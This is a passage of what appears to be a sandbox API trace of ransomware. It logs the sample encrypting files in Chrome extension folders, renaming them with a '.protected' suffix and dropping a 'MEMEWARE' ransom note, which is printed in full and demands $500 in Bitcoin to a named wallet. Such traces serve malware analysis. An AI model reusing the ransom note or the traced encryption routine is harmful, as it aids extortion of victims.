| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\.") returned 143 [0081.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.391] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.391] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.391] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.391] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.391] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\..") returned 144 [0081.391] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.391] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.391] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.392] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") 
returned 155 [0081.392] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.392] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.392] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.392] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0081.392] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0081.392] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0081.392] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.392] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0081.393] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.393] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0081.393] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.393] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.394] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.394] CloseHandle (hObject=0x168) returned 1 [0081.394] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.protected") returned 165 [0081.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.protected")) returned 1 [0081.395] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.395] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.395] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\RESTORE_FILES.txt") returned 159 [0081.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.395] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.395] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.396] lstrlenA (lpString="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") returned 684 [0081.396] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.396] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.396] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.396] CloseHandle (hObject=0x164) returned 1 [0081.396] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.396] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0081.397] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0081.397] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0081.397] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0081.397] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0081.397] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es") returned 141 [0081.397] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0081.397] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0081.397] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*") returned 143 [0081.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.397] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.397] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.397] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.397] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.397] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.397] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\.") returned 143 [0081.397] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.397] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.397] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.397] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.397] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.397] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.397] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.397] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\..") returned 144 [0081.397] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.397] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.397] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.397] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.398] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.398] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") 
returned 155 [0081.398] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.398] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0081.399] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0081.399] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0081.399] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.399] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10d, lpOverlapped=0x0) returned 1 [0081.400] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.400] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10d, lpOverlapped=0x0) returned 1 [0081.400] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.400] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.400] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.400] CloseHandle (hObject=0x168) returned 1 [0081.401] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.protected") returned 165 [0081.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.protected")) returned 1 [0081.401] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.401] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.401] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0081.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.402] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.402] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.403] lstrlenA (lpString="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") returned 684 [0081.403] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.403] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.403] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.403] CloseHandle (hObject=0x164) returned 1 [0081.403] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0081.403] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0081.404] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi") returned 141 [0081.404] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0081.404] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0081.404] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*") returned 143 [0081.404] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.405] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.405] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.405] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.405] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.405] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.405] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\.") returned 143 [0081.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.405] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.405] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.405] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.405] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.405] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.405] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.405] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\..") returned 144 [0081.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.405] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.405] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.405] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") 
returned 155 [0081.405] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.405] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 